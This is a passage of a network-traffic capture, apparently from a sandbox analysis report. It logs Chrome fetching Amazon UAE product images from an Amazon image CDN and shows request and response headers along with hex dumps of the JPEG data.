                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 08 05 06 07 01 09 01 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 02 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b9 60 1e 61 6a 9f 11 be bf a3 27 ce c5 74
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"4`aj't
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 79 9e 58 ed e3 05 a2 ae e3 86 fc 1d e4 bd 53 8e 3a 84 37 1f 4a dd af 1e 9e c0 ad 14 f7 18 b9 a8 90 09 e3 37 cd be 4b 6f bb 02 17 79 9e 58 ed e5 02 d1 57 71 c3 7e 0e f2 1c 3a 0d 55 8c 1b 5d 48 2a 08 ab 49 91 c1 b4 73 04 ca 52 aa 89 2c a5 0a 52 cb eb 6e 7a 04 2e f3 3c b1 db ca 05 a2 ae e3 86 fc 1d d5 b7 3d 02 13 79 9e 58 ed e5 02 d1 57 71 c3 7e 0e ea db 9e 81 09 bc cf 2c 76 f2 81 68 a8 70 df 83 ba b6 e7 a0 42 6f 33 cb 1d bc a0 5a 2a 1c 37 e0 e8 79 2a 54 a9 34 bc 64 14 4f 85 21 d3 3e 94 3c 29 7c 52 f1 10 a5 de 92 93 c7 30 92 7b f7 4b c1 ba ca 75 db be 81 07 bc cf 2c 76 ea 81 68 a8 70 df 83 c2 24 91 d2 ba 1b 33 98 6d 2d 91 94 ae 99 2e d4 b4 62 96 93 dc 90 df 51 43 7d 02 db 6d 53 9d db 4a 1f c5 d0 33 4c be 36 ef a0 41 ef 33 cb 1b ba a0 5a 2a 1c 37 e0 f0 88 34
                                                                                                                                                                                                                                                                      Data Ascii: yXS:7J7KoyXWq~:U]H*IsR,Rnz.<=yXWq~,vhpBo3Z*7y*T4dO!><)|R0{Ku,vhp$3m-.bQC}mSJ3L6A3Z*74
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ab c5 c1 47 71 12 9b d5 7d 90 b2 6f 92 ca 84 48 68 9d ed 46 af ee 44 f5 54 ef 68 96 89 fa 7b 9d e5 5f 3a 13 31 ab 35 9e 8b dd fc bc b1 ac 45 5f fa b3 6e 0f 11 89 38 6f 5d ea f1 70 25 3b ca fb c6 da 8b f7 2c d7 52 c4 57 aa a5 ea ea 26 36 d4 44 ca cc 8b 64 89 3f 22 d7 5b e9 c1 e2 31 27 0d eb bd 57 43 15 6f 88 c4 9c 37 ae f5 5d 0c 55 be 23 12 70 de bb d5 74 31 56 f8 8c 5c 37 ae f5 5d 0c 42 c8 54 9c ff 00 26 2a 0e a2 43 90 54 c8 72 4e 9f 21 53 98 a9 6a 48 54 1c 82 9e 23 17 0d eb bd 57 43 10 ee ee 83 ed 5b ed 22 4f d6 63 f2 5a 2c 22 59 d4 88 b4 cd 2d f5 1e b4 75 99 17 5f 7f 42 25 be 21 fa 91 17 9f 39 0b 33 c4 62 e1 bd 77 aa e8 62 f6 1b de f4 99 0d 66 9d 08 74 b7 a7 e7 99 0f ed 21 f2 ba 92 1f db 31 9d 25 2f 5b 08 7f 6f a9 0f 42 1d fc bf 3c c8 7a 7a 8d 96 96 97
                                                                                                                                                                                                                                                                      Data Ascii: Gq}oHhFDTh{_:15E_n8o]p%;,RW&6Dd?"[1'WCo7]U#pt1V\7]BT&*CTrN!SjHT#WC["OcZ,"Y-u_B%!93bwbft!1%/[oB<zz
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 32 36 c0 35 97 08 20 13 13 66 65 e7 15 ad a4 2c b7 f7 97 79 b5 d2 4d e3 42 c9 12 f4 06 0c 28 4e 05 16 d0 4c a4 89 b1 d5 8f 84 1c bc 18 09 33 a6 1a ac 41 88 b3 90 d5 7d d3 41 07 64 45 07 81 b1 ad 69 a7 a0 af 60 02 ec 0a 20 9b 13 24 e5 84 11 45 91 21 89 90 c6 0c 22 19 ad 64 63 8b 85 e8 22 8b 2e 1c f1 56 19 a7 de 00 2a 07 64 d4 52 18 31 17 0e f2 47 08 32 1c fa 53 10 e2 cb 16 c6 e5 94 f2 ee 76 ba 49 bc 68 59 6a 4c 37 ce dd 11 17 00 96 d5 41 68 d3 0f f9 5f d4 5d d8 0b e3 4f ea 30 44 78 dd 7c 0e 2c 8e 10 c7 8c 64 2e b6 ca 28 73 ce e1 49 c8 61 31 39 a0 cc 5f ee 75 fe 23 0d 76 d1 9a c6 4e 58 08 35 84 68 f3 44 2c 06 be 42 72 9c d9 3d 80 50 60 3f 66 b7 37 2c 8f 97 79 b5 d2 4d e3 42 cb 51 85 1d ed 28 da 2c 55 88 11 50 73 17 ed 09 79 42 34 52 ba 1b bd d3 91 28 42 17
                                                                                                                                                                                                                                                                      Data Ascii: 265 fe,yMB(NL3A}AdEi` $E!"dc".V*dR1G2SvIhYjL7Ah_]O0Dx|,d.(sIa19_u#vNX5hD,Br=P`?f7,yMBQ(,UPsyB4R(B
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: dd 11 64 17 dd be 13 29 d0 64 87 ac a1 6f 88 a2 a1 ad 10 09 95 5d 29 76 9c ba 95 1b dd ca aa 72 a0 16 80 af 4a 6f 3d db d4 13 aa 1d 08 75 10 9e 07 b3 f9 df cd e3 bb 7a 82 56 08 42 10 60 c3 a1 3c 0f 67 f3 be bb cb 76 f5 04 ea 42 10 87 41 84 3f f0 70 fd de 5f b7 a8 77 42 10 87 52 1d 3c ef 67 4b c8 b2 b6 40 14 86 5f 17 71 8b 87 45 e2 81 c7 50 2a db cd 4c 98 3e a5 e0 ac 69 61 83 56 d9 4b ac d4 60 d3 0a cc e6 22 8b d3 e9 d9 1d 38 2a a6 9d 6d 4b 37 29 39 07 08 95 53 e5 e0 2b 8e 5c f7 6f 84 0c 18 15 8b 5b 03 b3 48 07 31 b6 79 b6 98 1a 91 e5 38 b4 a9 e0 cb 98 67 8f 11 cf 0c 23 60 a0 de a8 4d c2 84 2e 22 4b ff 00 3d dc 09 78 30 4b f2 b6 68 0b 15 ef 09 6d 58 36 0e 20 36 b1 5d 42 53 14 b2 df 7b 7b 60 e9 3b c7 f6 f5 1c e8 42 0c 1e 87 41 97 35 c9 e6 7b 66 a9 40 14 d9
                                                                                                                                                                                                                                                                      Data Ascii: d)do])vrJo=uzVB`<gvBA?p_wBR<gK@_qEP*L>iaVK`"8*mK7)9S+\o[H1y8g#`M."K=x0KhmX6 6]BS{{`;BA5{f@
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC167INData Raw: bf a1 ff 00 1f e7 4b 35 67 e0 03 ec 48 f4 20 cb e8 4b 97 2e 0c b9 72 e0 74 b7 5e d8 7e fa fe 73 f4 35 b9 47 0b fe 6d 45 d2 be cb 9f 71 86 1b 7d 72 fd ba 65 48 93 23 ac a4 a9 2e 6c 59 bc e6 df ee 91 3d 5d dc b3 be 73 fe 7f f0 5f ff c4 00 19 11 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 00 10 40 30 60 ff da 00 08 01 02 01 09 3f 00 c6 66 66 78 48 88 f2 22 22 23 ef 59 99 c7 b9 99 99 99 cf ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 ff da 00 08 01 03 01 09 3f 00 52 ff d9
                                                                                                                                                                                                                                                                      Data Ascii: K5gH K.rt^~s5GmEq}reH#.lY=]s_@0`?ffxH""#Yp?R


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      101192.168.2.549836151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC458OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944618_186x116_1X_ar_AE._SY116_CB567106849_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 5599
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 3471a058-e4c6-402f-b6c7-77ceea44d8c4
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Fri, 16 Aug 2024 08:05:34 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 11:53:59 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 455686
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:45 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kjyo7100072-IAD, cache-nyc-kteb1890054-NYC
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 03 02 03 03 03 03 04 06 05 05 04 05 05 08 06 04 06 05 07 05 05 05 07 05 07 07 05 06 07 06 06 08 07 06 06 07 08 06 07 08 0b 08 09 08 0a 08 08 0a 08 0b 08 0b 0b 0b 0b 0c 0d 0b 07 0c 11 01 03 03 02 03 03 03 04 03 03 06 0a 07 05 08 0b 09 04 08 0d 0b 0d 08 0b 0b 0b 0b 08 0e 0b 0d 0a 0b 06 0b 0b 08 0a 0a 08 08 09 08 09 0b 08 0b 0b 0b 05 08 0b 0a 07 0f 08 08 07 0b 0a 0c 0a 07 0b 0e ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 39 00 00 01 03 05 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 05 01 04 06 07 08 09 0a 01 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f5 b5 b7 db f1 a4 b6 ed 5d
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt"9]
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 80 d8 34 83 c0 c7 1d 7f 80 fa 64 69 c8 ed ee 5a 48 ed d3 6c 02 65 69 a6 85 28 13 8f cf ab ff c4 00 28 11 00 01 04 02 02 02 01 02 07 00 00 00 00 00 00 00 04 01 02 03 05 06 07 00 10 11 12 14 20 21 08 13 16 17 23 32 41 ff da 00 08 01 02 01 01 08 00 e9 06 8b c2 70 7c 18 32 2b c6 25 27 d2 cc 33 d1 0a 0b 49 d5 93 60 48 2f 6e 8d c7 91 62 6c 82 e9 ea 19 64 3e 39 af b5 85 25 49 8c 82 1c a2 9c 30 63 1d 45 6a 2b 95 11 3e 62 d6 a2 41 17 48 7f 84 44 e2 5c 4c 88 88 9f a8 0c 5f 5f 33 58 dd 7c 42 0f 03 f7 92 c3 ed c6 6d d3 23 45 6b 24 da c4 4c f5 92 5b 7c ad d6 ed 89 aa 23 10 78 94 e7 b9 ca e5 55 5e 7f bd 54 63 86 dd 9a c0 41 87 f0 f3 1a 85 fc eb 82 83 15 14 f4 a3 64 58 cc b4 d6 12 8e ff 00 6e 84 09 4a 99 19 c3 0b 49 e4 44 8f e8 d5 d8 9b 86 12 5b 99 fa da b4 35 53 dc cd
                                                                                                                                                                                                                                                                      Data Ascii: 4diZHlei(( !#2Ap|2+%'3I`H/nbld>9%I0cEj+>bAHD\L__3X|Bm#Ek$L[|#xU^TcAdXnJID[5S
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: 9f d1 a0 08 1c d8 d3 bb 82 8d 4c 34 07 b9 6a b8 39 7b 10 b5 9b e2 d4 37 e5 a7 18 cb df 13 15 c2 32 f7 c4 c4 d7 f4 da fe dd 3b 7e 31 c9 3d 6d d8 35 d8 19 ad 9f 2a cf 56 a3 a8 62 81 72 1b 8e 69 0f 2a 11 41 09 b4 9c 54 33 ca 59 b2 5a 50 0f d6 6b 34 06 9b 71 8b da 66 f1 7a 22 59 d2 ef 50 b5 f7 a6 b0 85 23 8d 7a b3 3d b9 a1 6d 46 43 21 1f 89 ac e4 ac 4b 6b dc 79 a1 36 01 ed a7 67 e7 43 15 46 fb 0b 90 a4 e8 e6 9a 0c 23 7f dc ad f1 3a 35 fb dd 9d 79 1f d9 f7 3b f1 d5 ea 5f 7f ba b4 af eb ff 00 14 28 4a d0 08 9a 02 c9 cd 04 21 89 48 58 c2 e0 a5 04 c4 bd df 89 43 10 96 03 33 36 f6 ec c5 0e e4 c2 0c 2e 40 d8 1e d4 a8 28 21 ac c6 23 04 51 f0 e5 6c 0d d6 56 ce 56 eb ad 64 e4 5b 78 bb 61 8b b7 77 a3 06 06 40 04 77 1c cd 1b 05 08 80 02 5c 49 72 68 e9 4d a6 70 9c 3c 4c
                                                                                                                                                                                                                                                                      Data Ascii: L4j9{72;~1=m5*Vbri*AT3YZPk4qfz"YP#z=mFC!Kky6gCF#:5y;_(J!HXC36.@(!#QlVVd[xaw@w\IrhMp<L
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC1378INData Raw: ad 11 ad 67 59 59 da 52 da a5 52 c0 2b 39 ba 07 16 47 f4 6a 33 70 03 be 63 8b 43 15 ed a8 0e 52 0b 60 2f ed a9 2c 34 f7 09 22 aa 5c 9a d6 3e d7 2d 1c cb 52 8a a5 57 2a b9 56 3d ab 5d 80 58 ec ca 17 90 0d 2d 35 81 0b 66 39 97 83 d8 fd c6 69 72 29 55 2c a5 c4 06 5a e4 be f7 76 8f 59 88 f8 9f 97 32 8b 3f 87 ee 35 d1 12 a1 00 83 2a e9 98 9e 04 11 a5 3b 3b 0c db e5 c9 cb f1 02 bb 92 fa d1 34 65 00 e0 73 5c 7c ca d0 07 ad a8 9e 37 3f 24 19 bd 8e 05 7c cf 3f b5 66 39 b1 b0 31 89 78 08 e1 0c 0f b7 fa 20 d3 0e df 26 aa 88 08 8e 89 a4 4e 43 57 eb ea 34 15 50 6a b8 0f 96 3b d2 87 77 48 70 b6 3f ab a3 c8 01 70 fc 3f 6d 1b 3f c0 ca 65 31 54 01 a4 48 1b 8c 3c c0 7d 07 a9 8c e1 97 c5 b5 03 77 8b 86 00 03 40 d0 8c 70 41 e6 2a 3c a8 a5 45 85 07 54 bd fc c1 36 7c 70 ec 4c
                                                                                                                                                                                                                                                                      Data Ascii: gYYRR+9Gj3pcCR`/,4"\>-RW*V=]X-5f9ir)U,ZvY2?5*;;4es\|7?$|?f91x &NCW4Pj;wHp?p?m?e1TH<}w@pA*<ET6|pL
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC87INData Raw: 53 fc ef 63 fc 6b 97 c3 29 37 ab b9 b2 f4 6e 5b 5c b2 9e 56 4e 77 5d d7 a3 2b ae 5d 0e e6 ff 00 db 7f b3 ee ef ae 57 4f 3d 4e 4d ce ef 46 b9 74 25 23 02 a2 9f 1d 1a e0 23 18 9b 04 ac 1f 01 0d 50 29 14 d6 5b ad ef 6f 63 5b bf a6 ed ad 8f c2 71 af 8f da 3f ff d9
                                                                                                                                                                                                                                                                      Data Ascii: Sck)7n[\VNw]+]WO=NMFt%##P)[oc[q?


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      102192.168.2.54982018.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC696OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Cleaning_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 3984
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 5bfd2a04-7e1b-42f0-9be4-2db80c1008a1
                                                                                                                                                                                                                                                                      Date: Mon, 19 Aug 2024 05:33:43 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 12 Aug 2024 12:10:26 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-524,/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Cleaning_186x116_2X_en_AE
                                                                                                                                                                                                                                                                      Expires: Sun, 14 Aug 2044 05:33:43 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-524 /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Cleaning_186x116_2X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 8dea89f951a7387e4ebbfe70f982f4a4.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 219302
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: cVuW_roQRuv_Lw8s7szu_pRcok08u1xPqceMApHJjttLJFmMgb9POQ==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC3984INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 01 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 02 07 08 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 01 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f5 b4 e9 3c cd 5c a2 81 95 66 9e 5c ad
                                                                                                                                                                                                                                                                      Data Ascii: JFIF))$,$!$,$A3--3AK?<?K[QQ[rlr))$,$!$,$A3--3AK?<?K[QQ[rlrt"5<\f\


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      103192.168.2.54982118.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC697OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Nutrition_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC946INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4032
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 256bcf06-0375-414f-995b-45599684bb14
                                                                                                                                                                                                                                                                      Date: Mon, 12 Aug 2024 12:37:47 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Mon, 12 Aug 2024 12:10:26 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-774,/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Nutrition_186x116_2X_en_AE
                                                                                                                                                                                                                                                                      Expires: Sun, 07 Aug 2044 12:37:47 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-774 /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Nutrition_186x116_2X_en_AE
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 3f2f1c546e63f10a66abd1c978af36f6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 373450
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS1-P3
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: UQdJFcYXTTGCw2ek5V7jcdBOttvYoQkZTCBBDIwL55cI0fppAcN-iA==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC4032INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 01 08 08 08 08 08 08 09 0a 0a 09 0c 0d 0c 0d 0c 12 10 0f 0f 10 12 1b 13 15 13 15 13 1b 29 19 1e 19 19 1e 19 29 24 2c 24 21 24 2c 24 41 33 2d 2d 33 41 4b 3f 3c 3f 4b 5b 51 51 5b 72 6c 72 95 95 c9 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 04 05 06 07 03 02 08 01 00 02 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 06 03 04 05 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d6 d3 d2 79 9b 79 45 02 ab c6 1d de d5
                                                                                                                                                                                                                                                                      Data Ascii: JFIF))$,$!$,$A3--3AK?<?K[QQ[rlr))$,$!$,$A3--3AK?<?K[QQ[rlrt"5yyE


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      104192.168.2.54982318.239.99.1454432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:45 UTC700OUTGET /images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/1741539_QC-HPC-Personalcare_186x116_2X_en_AE._SY116_CB566996700_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:46 UTC940INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4391
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: 6fc36a1a-daea-4e15-a2ca-dd6ae31b52fa
                                                                                                                                                                                                                                                                      Date: Thu, 15 Aug 2024 14:51:07 GMT
